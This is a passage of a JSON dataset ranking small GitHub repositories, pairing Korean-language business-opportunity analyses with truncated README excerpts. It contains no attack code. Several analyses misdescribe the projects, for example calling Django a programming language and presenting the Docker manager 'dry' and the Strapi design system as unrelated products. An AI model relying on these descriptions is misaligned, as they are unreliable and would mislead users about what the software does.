B. Raspbian 12 Book","composite_score":0.0213,"license_safety_tag":"unknown"},{"name":"MangoDB-io/MangoDB","github_url":"https://github.com/MangoDB-io/MangoDB","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# MangoDB 상용화 분석\n\n## 왜 보물인가\nMongoDB는 데이터를 저장하고 관리하는 핵심 기술로, 현대 웹서비스와 앱의 기초를 담당하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 데이터 관리 플랫폼**\n- 중소 스타트업의 데이터 저장·분석을 대신해주는 관리형 서비스로 제공\n- 고객이 복잡한 설정 없이 데이터만 올려서","readme_excerpt":"# FerretDB\n\n<!-- textlint-disable one-sentence-per-line -->\n\n> [!TIP]\n> Looking for FerretDB v1?\n> It is [there](https://github.com/FerretDB/FerretDB/tree/main-v1).\n\n<!-- textlint-enable one-sentence-per-line -->\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/FerretDB/FerretDB/v2/ferretdb.svg)](https://pkg.go.dev/github.com/FerretDB/FerretDB/v2/ferretdb)\n\n[![Go](https://github.com/FerretDB/FerretDB/actions/workflows/go.yml/badge.svg?branch=main)](https://github.com/FerretDB/FerretDB/actions/workflows/go.yml)\n[![codecov](https://codecov.io/gh/FerretDB/FerretDB/branch/main/graph/badge.svg?token=JZ56XFT3DM)](https://codecov.io/gh/FerretDB/FerretDB)\n\n[![Security](https://github.com/FerretDB/FerretDB/actions/workflows/security.yml/badge.svg?branch=main)](https://github.com/FerretDB/FerretDB/actions/workflows/security.yml)\n[![Packages](https://github.com/FerretDB/FerretDB/actions/workflows/packages.yml/badge.svg?branch=main)](https://github.com/FerretDB/FerretDB/actions/workflows/pack","composite_score":0.0213,"license_safety_tag":"safe"},{"name":"awslabs/aws-lambda-powertools-python","github_url":"https://github.com/awslabs/aws-lambda-powertools-python","stars":7,"language":"Python","license":"MIT-0","abandonment_months":0,"description":"# AWS Lambda Powertools Python 평가 분석\n\n## 왜 보물인가\n클라우드 서비스를 사용하는 기업들이 복잡한 작업을 간단하게 처리할 수 있도록 도와주는 무료 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **자동화 SaaS 서비스**: 고객사의 반복 업무(데이터 처리, 정산, 리포트 자동 생성)를 클라우드에서 자동으로 처리하는 서비","readme_excerpt":"<!-- markdownlint-disable MD013 MD041 MD043  -->\n# Powertools for AWS Lambda (Python)\n\n[![Build](https://github.com/aws-powertools/powertools-lambda-python/actions/workflows/quality_check.yml/badge.svg)](https://github.com/aws-powertools/powertools-lambda-python/actions/workflows/python_build.yml)\n[![codecov.io](https://codecov.io/github/aws-powertools/powertools-lambda-python/branch/develop/graphs/badge.svg)](https://app.codecov.io/gh/aws-powertools/powertools-lambda-python)\n![PythonSupport](https://img.shields.io/static/v1?label=python&message=%203.10|%203.11|%203.12|%203.13|%203.14&color=blue?style=flat-square&logo=python) ![PyPI version](https://badge.fury.io/py/aws-lambda-powertools.svg) ![PyPi monthly downloads](https://img.shields.io/pypi/dm/aws-lambda-powertools) [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/aws-powertools/powertools-lambda-python/badge)](https://scorecard.dev/viewer/?uri=github.com/aws-powertools/powertools-lambda-python)\n[![Disc","composite_score":0.0212,"license_safety_tag":"safe"},{"name":"JoshuaWise/better-sqlite3","github_url":"https://github.com/JoshuaWise/better-sqlite3","stars":5,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# better-sqlite3 상품화 분석\n\n## 왜 보물인가\n데이터베이스를 빠르고 안정적으로 관리할 수 있는 기본 도구로, 많은 웹서비스와 앱의 핵심 기반이 되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 프로젝트 관리 웹앱(Trello 같은)의 데이터 저장소로 활용하여 빠른 속도 제공\n2. **내부 업무 도구**: 중소기","readme_excerpt":"# better-sqlite3 [![Build Status](https://github.com/JoshuaWise/better-sqlite3/actions/workflows/build.yml/badge.svg)](https://github.com/JoshuaWise/better-sqlite3/actions/workflows/build.yml?query=branch%3Amaster)\n\nThe fastest and simplest library for SQLite in Node.js.\n\n- Full transaction support\n- High performance, efficiency, and safety\n- Easy-to-use synchronous API *(better concurrency than an asynchronous API... yes, you read that correctly)*\n- Support for user-defined functions, aggregates, virtual tables, and extensions\n- 64-bit integers *(invisible until you need them)*\n- Worker thread support *(for large/slow queries)*\n\n## Help this project stay strong! &#128170;\n\n`better-sqlite3` is used by thousands of developers and engineers on a daily basis. Long nights and weekends were spent keeping this project strong and dependable, with no ask for compensation or funding, until now. If your company uses `better-sqlite3`, ask your manager to consider supporting the project:\n\n- [Becom","composite_score":0.0212,"license_safety_tag":"safe"},{"name":"doctrine/instantiator","github_url":"https://github.com/doctrine/instantiator","stars":11,"language":"PHP","license":"mit","abandonment_months":2,"description":"# Doctrine Instantiator 분석\n\n## 왜 보물인가\n프로그래밍 라이브러리 중에서 가장 기본이 되는 '객체 생성 도구'로, 많은 대형 소프트웨어 프로젝트들이 내부적으로 의존하고 있는 핵심 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터베이스 관리 소프트웨어나 자동화 도구에서 복잡한 데이터 구조를 빠르게 생성해야","readme_excerpt":"# Doctrine Instantiator\n\nThis library provides a way of avoiding usage of constructors when instantiating PHP classes.\n\n[![Build Status](https://travis-ci.org/doctrine/instantiator.svg?branch=master)](https://travis-ci.org/doctrine/instantiator)\n[![Code Coverage](https://codecov.io/gh/doctrine/instantiator/branch/master/graph/badge.svg)](https://codecov.io/gh/doctrine/instantiator/branch/master)\n[![Dependency Status](https://www.versioneye.com/package/php--doctrine--instantiator/badge.svg)](https://www.versioneye.com/package/php--doctrine--instantiator)\n\n[![Latest Stable Version](https://poser.pugx.org/doctrine/instantiator/v/stable.png)](https://packagist.org/packages/doctrine/instantiator)\n[![Latest Unstable Version](https://poser.pugx.org/doctrine/instantiator/v/unstable.png)](https://packagist.org/packages/doctrine/instantiator)\n\n## Installation\n\nThe suggested installation method is via [composer](https://getcomposer.org/):\n\n```sh\ncomposer require doctrine/instantiator\n```\n\n## Usag","composite_score":0.0211,"license_safety_tag":"safe"},{"name":"strapi/parts","github_url":"https://github.com/strapi/parts","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# strapi/parts 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에 필요한 부품 정보를 쉽게 관리하고 연결할 수 있는 기초 시스템으로, 전자상거래나 제조업체의 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자부품 판매 플랫폼**: 부품 카탈로그, 재고, 호환성 정보를 한곳에서 관리하고 판매하는 SaaS 서비스\n2. **기업 부","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://strapi.io\">\n    <img src=\"./assets/logo.svg\" width=\"318px\" alt=\"Strapi logo\" />\n  </a>\n</p>\n<p align=\"center\">\n<a href=\"https://design-system.strapi.io/\">Documentation</a>\n<br />\n\n[![Version](https://img.shields.io/npm/v/@strapi/design-system?style=flat&colorA=4945ff&colorB=4945ff)](https://www.npmjs.com/package/@strapi/design-system)\n[![Downloads](https://img.shields.io/npm/dt/@strapi/design-system.svg?style=flat&colorA=4945ff&colorB=4945ff)](https://www.npmjs.com/package/@strapi/design-system)\n[![Discord Shield](https://img.shields.io/discord/811989166782021633?style=flat&colorA=4945ff&colorB=4945ff&label=discord&logo=discord&logoColor=f0f0ff)](https://discord.gg/strapi)\n\n# Welcome! 👋👋👋\n\nStrapi Design System provides guidelines and tools to help anyone make Strapi's contributions more cohesive and to build\nplugins more efficiently.\n\n## Installation\n\nInstall Strapi Design System and its peer dependencies:\n\n```sh\n$ yarn add react react-dom @strapi/","composite_score":0.021,"license_safety_tag":"safe"},{"name":"Rust-GPU/Rust-CUDA","github_url":"https://github.com/Rust-GPU/Rust-CUDA","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# Rust-GPU/Rust-CUDA 분석\n\n## 왜 보물인가\n고성능 그래픽 카드를 활용해 복잡한 계산을 빠르게 처리할 수 있는 기술로, 인공지능·영상 처리·금융 분석 등 수많은 산업에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 학습 플랫폼 SaaS**: 누구나 손쉽게 인공지능 모델을 만들 수 있는 웹 서비스로 판매\n2. **영상·이미지 처리","readme_excerpt":"<div align=\"center\">\n  <h1>The Rust CUDA Project</h1>\n\n  <p>\n    <strong>An ecosystem of libraries and tools for writing and executing extremely fast GPU code\n    fully in <a href=\"https://www.rust-lang.org/\">Rust</a></strong>\n  </p>\n</div>\n\n> [!IMPORTANT]\n> This project is no longer dormant and is [being\n> rebooted](https://rust-gpu.github.io/blog/2025/01/27/rust-cuda-reboot). Read the [latest status update](https://rust-gpu.github.io/blog/2025/08/11/rust-cuda-update).\n> Please contribute!\n>\n> The project is still in early development, however. Expect bugs, safety issues, and things that\n> don't work.\n\n## Documentation\n\nPlease see [The Rust CUDA Guide](https://rust-gpu.github.io/rust-cuda/) for documentation on Rust\nCUDA.\n\n## License\n\nLicensed under either of\n\n- Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or\n  http://www.apache.org/licenses/LICENSE-2.0)\n- MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your discretion.\n\n### Contrib","composite_score":0.021,"license_safety_tag":"safe"},{"name":"alibaba/PolarDB-for-PostgreSQL","github_url":"https://github.com/alibaba/PolarDB-for-PostgreSQL","stars":9,"language":"C","license":"Apache-2.0","abandonment_months":0,"description":"# PolarDB-for-PostgreSQL 사업화 분석\n\n## 왜 보물인가\n알리바바가 만든 초고속 데이터베이스로, 기업들이 대량의 정보를 빠르게 처리할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자상거래 플랫폼이 수백만 고객의 주문 정보를 실시간으로 처리하고 검색하는 데 사용\n2. **내부 업무 도구**:","readme_excerpt":"<div align=\"center\">\n\n[![logo](https://raw.githubusercontent.com/polardb/polardb-pg-docs/main/docs/.vuepress/public/images/polardb.png)](https://polardb.github.io/polardb-pg-docs/)\n\n# PolarDB for PostgreSQL\n\n**A cloud-native database developed by Alibaba Cloud**\n\n#### English | [简体中文](./README_zh.md)\n\n[![official](https://img.shields.io/badge/official%20site-blueviolet?style=flat&logo=alibabacloud)](https://polardb.github.io/polardb-pg-docs/)\n\n[![GitHub License](https://img.shields.io/github/license/polardb/PolarDB-for-PostgreSQL?style=flat&logo=apache)](./LICENSE)\n[![github-issues](https://img.shields.io/github/issues/polardb/PolarDB-for-PostgreSQL?style=flat&logo=github)](https://github.com/polardb/PolarDB-for-PostgreSQL/issues)\n[![github-pullrequest](https://img.shields.io/github/issues-pr/polardb/PolarDB-for-PostgreSQL?style=flat&logo=github)](https://github.com/polardb/PolarDB-for-PostgreSQL/pulls)\n[![GitHub Discussions](https://img.shields.io/github/discussions/polardb/PolarDB-fo","composite_score":0.0209,"license_safety_tag":"safe"},{"name":"lovasoa/whitebophir","github_url":"https://github.com/lovasoa/whitebophir","stars":6,"language":"JavaScript","license":"agpl-3.0","abandonment_months":0,"description":"# whitebophir 프로젝트 분석\n\n## 왜 보물인가\n여러 사람이 동시에 같은 화면에 그림을 그리고 공유할 수 있는 협업 도구로, 원격 회의나 팀 작업에서 즉시 아이디어를 시각화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 협업 화이트보드 구독 플랫폼 (Miro, Mural 경쟁)\n2. **내부 업무 도구**: 기업","readme_excerpt":"# WBO\n\nWBO is an online collaborative whiteboard that allows many users to draw simultaneously on a large virtual board.\nThe board is updated in real time for all connected users, and its state is always persisted. It can be used for many different purposes, including art, entertainment, design, teaching.\n\nA demonstration server is available at [wbo.ophir.dev](https://wbo.ophir.dev)\n\n## Screenshots\n\n<table>\n <tr>\n  <td> The <i><a href=\"https://wbo.ophir.dev/boards/anonymous\">anonymous</a></i> board\n  <td> <img width=\"300\" src=\"https://user-images.githubusercontent.com/552629/59885574-06e02b80-93bc-11e9-9150-0670a1c5d4f3.png\">\n  <td> collaborative diagram editing\n  <td> <img alt=\"Screenshot of WBO's user interface: architecture\" width=\"300\" src=\"https://user-images.githubusercontent.com/552629/59915054-07101380-941c-11e9-97c9-4980f50d302a.png\" />\n  \n  <tr>\n   <td> teaching math on <b>WBO</b>\n   <td> <img alt=\"wbo teaching\" width=\"300\" src=\"https://user-images.githubusercontent.com/55262","composite_score":0.0207,"license_safety_tag":"risky"},{"name":"kolofordjango/kolo","github_url":"https://github.com/kolofordjango/kolo","stars":11,"language":"","license":"unknown","abandonment_months":1,"description":"# kolofordjango/kolo 분석\n\n## 왜 보물인가\nDjango(웹사이트 만드는 프로그래밍 언어)로 개발할 때 발생하는 버그를 자동으로 찾아서 개발 시간을 단축할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자 팀이 많은 스타트업에게 월 구독료 형태로 제공하는 코드 검사 플랫폼\n- **내부 업무 도구**: 대형","readme_excerpt":"# Kolo\n\n> [!TIP]\n> **Kolo v3 is here**\n> Trace data as plain text files, searchable by humans and agents alike. [See what's new](https://docs.kolo.app/changelog/#v3-0-0).\n\nTrace and visualize your Python code.\n\n[![downloads](https://img.shields.io/pypi/dm/kolo)](https://pypi.org/project/kolo/) [![Chat on Discord](https://img.shields.io/discord/899363528660635738?label=Chat%20on%20Discord)](https://discord.com/invite/FsTVcFwYUn)\n\n[![PyPI version](https://img.shields.io/pypi/v/kolo?label=python%20package)](https://pypi.org/project/kolo/) [![supported python versions](https://img.shields.io/pypi/pyversions/kolo)](https://pypi.org/project/kolo/)\n\n📋 [docs.kolo.app](https://docs.kolo.app)\n\n<img width=\"1283\" alt=\"image\" src=\"https://github.com/kolofordjango/kolo/assets/7718702/f332094d-a779-4d14-bd5c-1e0db4b2037e\">\n<p align=\"center\"><sup>Screenshot of Kolo from the <a href=\"https://github.com/kolofordjango/todo-demo\">Todo Demo app</a></sup></p>\n\n## Quickstart\n\nGetting started with Kolo only t","composite_score":0.0206,"license_safety_tag":"unknown"},{"name":"erupts/erupt","github_url":"https://github.com/erupts/erupt","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Erupt 저장소 분석\n\n## 왜 보물인가\n복잡한 관리 시스템을 누구나 쉽게 만들 수 있게 도와주는 기초 공사 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 정보 관리, 주문 처리 등을 자동으로 구성하는 기반 플랫폼\n- **내부 업무 도구**: 회사 직원, 재고, 매출을 관리하는 관리자용 화면 자동 생성\n- **API 판매**","readme_excerpt":"English &nbsp; | &nbsp; [中文](README-zh.md)\n\n<p align=\"center\"><img src=\"./erupt-web/src/main/resources/public/assets/logo-raw2.png\" height=\"120px\" alt=\"logo\"/></p>\n\n<h1 align=\"center\">Low-Code + AI & 🦞</h1>\n\n<h3 align=\"center\">MDD & Annotation-driven development, zero front-end code, zero CRUD, multi-dimensional data management</h3>\n<h3 align=\"center\"><a href=\"https://erupt.xyz\" target=\"_blank\">https://www.erupt.xyz</a></h3>\n\n---\n\n<p align=\"center\">\n    <a href=\"https://mvnrepository.com/search?q=erupt\"><img src=\"https://img.shields.io/maven-central/v/xyz.erupt/erupt\" alt=\"maven-central\"></a>\n    <a href=\"./LICENSE\"><img src=\"https://img.shields.io/badge/license-Apache%202-blue\" alt=\"license Apache 2.0\"></a>\n    <a href=\"https://github.com/erupts/erupt\"><img src=\"https://img.shields.io/github/stars/erupts/erupt?style=social\" alt=\"GitHub stars\"></a>\n    <a href=\"https://github.com/erupts/erupt\"><img src=\"https://img.shields.io/github/forks/erupts/erupt?style=social\" alt=\"GitHub forks\"><","composite_score":0.0205,"license_safety_tag":"safe"},{"name":"raxod502/straight.el","github_url":"https://github.com/raxod502/straight.el","stars":6,"language":"Emacs Lisp","license":"mit","abandonment_months":1,"description":"# straight.el 상업화 분석\n\n## 왜 보물인가\nEmacs 사용자들이 패키지를 더 간단하고 직관적으로 관리할 수 있도록 해주는 소수 전문가 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: Emacs 사용자 커뮤니티를 위한 클라우드 기반 패키지 관리 대시보드\n2. **기업 내부 도구**: 프로그래머 팀의 개발 환경 자동화 ","readme_excerpt":"**straight.el**: next-generation, purely functional package manager\nfor the [Emacs] hacker.\n\n**Please check out the [FAQ][#faq] and [news][#news] :)**\n\n[![Gitter chat][gitter-badge]][gitter]\n\n<!-- longlines-start -->\n\n<!-- toc -->\n\n- [Features](#features)\n- [Guiding principles](#guiding-principles)\n- [Getting started](#getting-started)\n    + [Debugging](#debugging)\n  * [Install packages](#install-packages)\n  * [But what about my fork of (obscure .el package)?](#but-what-about-my-fork-of-obscure-el-package)\n  * [Integration with `use-package`](#integration-with-use-package)\n  * [Edit packages locally](#edit-packages-locally)\n  * [Automatic repository management](#automatic-repository-management)\n  * [Configuration reproducibility](#configuration-reproducibility)\n- [Conceptual overview](#conceptual-overview)\n  * [TL;DR](#tldr)\n  * [What is a package?](#what-is-a-package)\n  * [Where do packages come from?](#where-do-packages-come-from)\n  * [What does this look like on disk?](#what-does-th","composite_score":0.0205,"license_safety_tag":"safe"},{"name":"doctrine/lexer","github_url":"https://github.com/doctrine/lexer","stars":11,"language":"PHP","license":"mit","abandonment_months":2,"description":"# Doctrine Lexer 상품화 분석\n\n## 왜 보물인가\n텍스트를 작은 단위로 자동 분해해주는 기술로, 복잡한 문장을 컴퓨터가 이해할 수 있게 변환하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **검색 엔진 SaaS**: 사용자가 입력한 복잡한 검색 조건을 자동으로 분석해 정확한 결과 제공\n2. **법률 문서 분석 API**: 계약서나 판례","readme_excerpt":"# Doctrine Lexer\n\n[![Build Status](https://github.com/doctrine/lexer/workflows/Continuous%20Integration/badge.svg)](https://github.com/doctrine/lexer/actions)\n\nBase library for a lexer that can be used in Top-Down, Recursive Descent Parsers.\n\nThis lexer is used in Doctrine Annotations and in Doctrine ORM (DQL).\n\nhttps://www.doctrine-project.org/projects/lexer.html\n","composite_score":0.0204,"license_safety_tag":"safe"},{"name":"GitJournal/GitJournal","github_url":"https://github.com/GitJournal/GitJournal","stars":6,"language":"Dart","license":"AGPL-3.0","abandonment_months":1,"description":"# GitJournal 상품화 분석\n\n## 왜 보물인가\n깃허브에 일기나 메모를 자동으로 저장해주는 앱으로, 개인의 생각을 안전하게 관리하고 싶어하는 수많은 사람들의 니즈를 충족시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인일지 SaaS 서비스**: 월 구독제로 모바일/웹에서 안전하게 일기를 작성하고 깃허브에 백업하는 유료 서비스\n2. **기업 ","readme_excerpt":"<p align=\"center\">\n  <img width=\"400\" height=\"auto\" src=\"https://gitjournal.io/images/logo.png\">\n  <br/>Mobile first Markdown Notes integrated with Git</b>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://play.google.com/store/apps/details?id=io.gitjournal.gitjournal&utm_source=github&utm_medium=link\"><img alt=\"Get it on Google Play\" src=\"https://gitjournal.io/images/android-store-badge.png\" height=\"75px\"/></a>\n  <a href=\"https://apps.apple.com/app/gitjournal/id1466519634&utm_source=github&utm_medium=link\"><img alt=\"Download on the App Store\" src=\"https://gitjournal.io/images/ios-store-badge.svg\" height=\"75px\"/></a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://circleci.com/gh/GitJournal/GitJournal\"><img alt=\"Build Status\" src=\"https://circleci.com/gh/GitJournal/GitJournal.svg?style=svg\"/></a>\n  <a href=\"https://www.gnu.org/licenses/agpl-3.0\"><img alt=\"License: AGPL v3\" src=\"https://img.shields.io/badge/License-AGPL%20v3-blue.svg\"></a>\n  </br>\n  <a href=\"https://api.reuse.software/info/github","composite_score":0.0203,"license_safety_tag":"risky"},{"name":"danluu/post-mortems","github_url":"https://github.com/danluu/post-mortems","stars":11,"language":"","license":"unknown","abandonment_months":0,"description":"# danluu/post-mortems 분석\n\n## 왜 보물인가\n서비스 장애가 발생했을 때 무엇이 잘못됐는지 체계적으로 기록하고 배우는 방법론을 모아놓은 실전 자료집입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 장애 발생 시 고객에게 투명하게 보여줄 사후 분석 보고서 자동 생성 도구\n2. **내부 업무 도구**: 조직의 실수와 장애를 문","readme_excerpt":"# A List of Post-mortems!\n\n## Table of Contents\n\n - **[Config Errors](#config-errors)**\n - **[Hardware/Power Failures](#hardwarepower-failures)**\n - **[Conflicts](#conflicts)**\n - **[Time](#time)**\n - **[Database](#database)**\n - **[Uncategorized](#uncategorized)**\n - **[Other lists of postmortems](#other-lists-of-postmortems)**\n - **[Analysis](#analysis)**\n - **[Contributors](#contributors)**\n\n<br/><br/>\n\n## Config Errors\n\n[Allegro](https://allegro.tech/2018/08/postmortem-why-allegro-went-down.html). E-commerce site went down after a sudden traffic spike caused by a marketing campaign. The outage was caused by a configuration error in cluster resource management which prevented more service instances from starting even though hardware resources were available.\n\n[Amazon](https://aws.amazon.com/message/74876-2/). A configuration change in the Seoul region incorrectly removed the setting that specifies the minimum healthy hosts for the EC2 DNS resolver fleet, so the system fell back to a","composite_score":0.0202,"license_safety_tag":"unknown"},{"name":"moncho/dry","github_url":"https://github.com/moncho/dry","stars":5,"language":"Go","license":"mit","abandonment_months":2,"description":"# moncho/dry 분석 보고서\n\n## 왜 보물인가\n반복적인 작업을 자동으로 처리해주는 도구로, 개발자들이 같은 일을 여러 번 하지 않도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사 데이터 정제 및 자동화 기능을 제공하는 클라우드 서비스\n2. **내부 업무 도구**: 회사 내 반복적인 코드 작업을 자동으로 처리하는 개발","readme_excerpt":"# dry\n\n[![MIT License](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/moncho/dryblob/master/LICENSE)\n![Build Status](https://github.com/moncho/dry/actions/workflows/go.yml/badge.svg)\n![Release](https://github.com/moncho/dry/actions/workflows/release.yml/badge.svg)\n[![Go Report Card](https://goreportcard.com/badge/github.com/moncho/dry)](https://goreportcard.com/report/github.com/moncho/dry)\n[![GoDoc](https://godoc.org/github.com/moncho/dry?status.svg)](https://godoc.org/github.com/moncho/dry)\n[![Github All Releases](https://img.shields.io/github/downloads/moncho/dry/total.svg)]()\n[![Release](https://img.shields.io/github/release/moncho/dry.svg?style=flat-square)](https://github.com/moncho/dry/releases/latest)\n[![dry](https://snapcraft.io/dry/badge.svg)](https://snapcraft.io/dry)\n\n**Dry** is a terminal application to manage **Docker** and **Docker Swarm**.\n\nIt shows information about Containers, Images and Networks, and, if running a **Swarm** cluster, ","composite_score":0.0202,"license_safety_tag":"safe"},{"name":"giswqs/leafmap","github_url":"https://github.com/giswqs/leafmap","stars":22,"language":"Python","license":"MIT","abandonment_months":0,"description":"# leafmap 저장소 분석\n\n## 왜 보물인가\n누구나 지도에서 데이터를 분석하고 시각화할 수 있는 도구로, 전문가 없이도 지역 분석이 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 부동산/건설사 대상 지역 분석 플랫폼**\n- 건설사가 개발 예정지의 주변 환경, 교통, 인구 데이터를 직접 확인하고 의사결정하는 서비스\n\n**2. 내부 ","readme_excerpt":"# Welcome to leafmap\r\n\r\n[![image](https://studiolab.sagemaker.aws/studiolab.svg)](https://studiolab.sagemaker.aws/import/github/opengeos/leafmap/blob/master/examples/notebooks/00_key_features.ipynb)\r\n[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/opengeos/leafmap/blob/master)\r\n[![notebook-link](https://img.shields.io/badge/notebook-link-e2d610?logo=jupyter&logoColor=white)](https://notebook.link/github/opengeos/leafmap/tree/master/lab/?path=docs%2Fnotebooks%2F00_key_features.ipynb)\r\n[![image](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/opengeos/leafmap/HEAD)\r\n[![image](https://img.shields.io/pypi/v/leafmap.svg)](https://pypi.python.org/pypi/leafmap)\r\n[![image](https://static.pepy.tech/badge/leafmap)](https://pepy.tech/project/leafmap)\r\n[![Conda Recipe](https://img.shields.io/badge/recipe-leafmap-green.svg)](https://github.com/conda-forge/leafmap-feedstock)\r\n[![image](https://img.shields.io/conda/vn/cond","composite_score":0.0202,"license_safety_tag":"safe"},{"name":"goverfl0w/discord-interactions","github_url":"https://github.com/goverfl0w/discord-interactions","stars":6,"language":"Python","license":"MIT","abandonment_months":1,"description":"# discord-interactions 상용화 분석\n\n## 왜 보물인가\n디스코드라는 인기 플랫폼에서 자동으로 상호작용하는 기능을 만들 수 있게 해주는 기술로, 커뮤니티 관리를 효율화하려는 기업들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디스코드 커뮤니티 자동 관리 플랫폼 구독 서비스 운영\n- **내부 업무 도구**: 게임사","readme_excerpt":"<div align=\"center\">\n\n   # Interactions.py\n   <br>\n\n   ![](https://img.shields.io/pypi/v/discord-py-interactions.svg?label=Version&logo=pypi)\n   ![](https://img.shields.io/badge/Python-3.10+-1081c1?logo=python)\n   [![](https://img.shields.io/pypi/dm/discord-py-slash-command.svg?logo=python&label=Downloads)](https://pypi.org/project/discord-py-interactions/)\n\n   [![](https://img.shields.io/badge/Code%20Style-black-000000.svg)](https://github.com/psf/black)\n   [![License](https://img.shields.io/badge/License-MIT-blue)](https://github.com/interactions-py/interactions.py/blob/stable/LICENSE)\n\n   [![](https://img.shields.io/badge/Docs-latest-x?logo=readthedocs)](https://interactions-py.github.io/interactions.py/)\n   [![](https://img.shields.io/badge/Guides-latest-x?logo=readthedocs)](https://interactions-py.github.io/interactions.py/Guides/01%20Getting%20Started)\n   [![image](https://discord.com/api/guilds/789032594456576001/embed.png)](https://discord.gg/interactions)\n\n</div>\n\n## A Feature","composite_score":0.0201,"license_safety_tag":"safe"},{"name":"Kreijstal/PT","github_url":"https://github.com/Kreijstal/PT","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":2,"description":"# Kreijstal/PT 프로젝트 분석\n\n## 왜 보물인가\n11개의 별과 지속적인 업데이트(2026년까지 활발함)를 고려할 때, 특정 분야에서 실제 수요를 충족하는 실용적인 도구로 평가됩니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 반복적인 작업 자동화나 데이터 처리 프로세스를 간소화하는 솔루션으로 제공\n2. **SaaS 서비스*","readme_excerpt":"# ProxyTown\nWell, you know, ponytown code is very bullshit and we need to proxy it for fuuun.\n\nOk first type\n\n    npm install\nDone? well after than then type \n\n    npm start.\nThat's fucking it!\n\n","composite_score":0.02,"license_safety_tag":"unknown"},{"name":"davidroyer/vue2-editor","github_url":"https://github.com/davidroyer/vue2-editor","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# vue2-editor 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 글을 쉽게 꾸며 쓸 수 있는 편집 도구를 만들 수 있게 해주는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **블로그/뉴스레터 플랫폼**: 사용자가 글을 작성할 때 글자를 굵게 하고, 이미지를 삽입하고, 색상을 바꿀 수 있는 에디터 제공\n2. **이메일 마케팅 도구**: 마케팅","readme_excerpt":"# Vue2Editor\n\n> An easy-to-use but yet powerful and customizable rich text editor powered by Quill.js and Vue.js\n\n<p align=\"center\">\n  <a href=\"https://www.vue2editor.com/\">\n  <h2>View Docs</h2>\n  </a>\n</p>\n\n![Vue2Editor-Centered](https://www.dropbox.com/s/7com4d32zct44nc/Vue2Editor-Centered.png?raw=1)\n\n[📖 **Release Notes**](./CHANGELOG.md)\n\n<!-- HTML Editor using [Vue.js](https://vuejs.org) and [Quill](http://quilljs.com/) -->\n\n<!-- ## Demo -->\n\n<!-- [fiddle](https://jsfiddle.net/su9zv0w9/1/) -->\n\n## Install\n\n_You can use Yarn or NPM_\n\n```bash\nnpm install vue2-editor\n```\n\n**OR**\n\n```bash\nyarn add vue2-editor\n```\n\n## Usage\n\n```javascript\n// Basic Use - Covers most scenarios\nimport { VueEditor } from \"vue2-editor\";\n\n// Advanced Use - Hook into Quill's API for Custom Functionality\nimport { VueEditor, Quill } from \"vue2-editor\";\n```\n\n## Nuxt.js\n\nAdd `vue2-editor/nuxt` to modules section of `nuxt.config.js`\n\n```javascript\n{\n  modules: [\"vue2-editor/nuxt\"];\n}\n```\n\nTo avoid seeing warnings f","composite_score":0.0198,"license_safety_tag":"safe"},{"name":"QuantStack/xtensor","github_url":"https://github.com/QuantStack/xtensor","stars":10,"language":"C++","license":"bsd-3-clause","abandonment_months":0,"description":"# QuantStack/xtensor 분석 보고서\n\n## 왜 보물인가\n복잡한 수학 계산을 빠르고 효율적으로 처리하는 오픈소스 엔진으로, 인공지능이나 데이터 분석이 필요한 모든 소프트웨어에 핵심 기술로 내장될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS 플랫폼**: 기업의 판매 추이, 고객 행동 분석 등 복잡한 데이터를 실시간으로 ","readme_excerpt":"# ![xtensor](docs/source/xtensor.svg)\n\n[![GHA Linux](https://github.com/xtensor-stack/xtensor/actions/workflows/linux.yml/badge.svg)](https://github.com/xtensor-stack/xtensor/actions/workflows/linux.yml)\n[![GHA OSX](https://github.com/xtensor-stack/xtensor/actions/workflows/osx.yml/badge.svg)](https://github.com/xtensor-stack/xtensor/actions/workflows/osx.yml)\n[![GHA 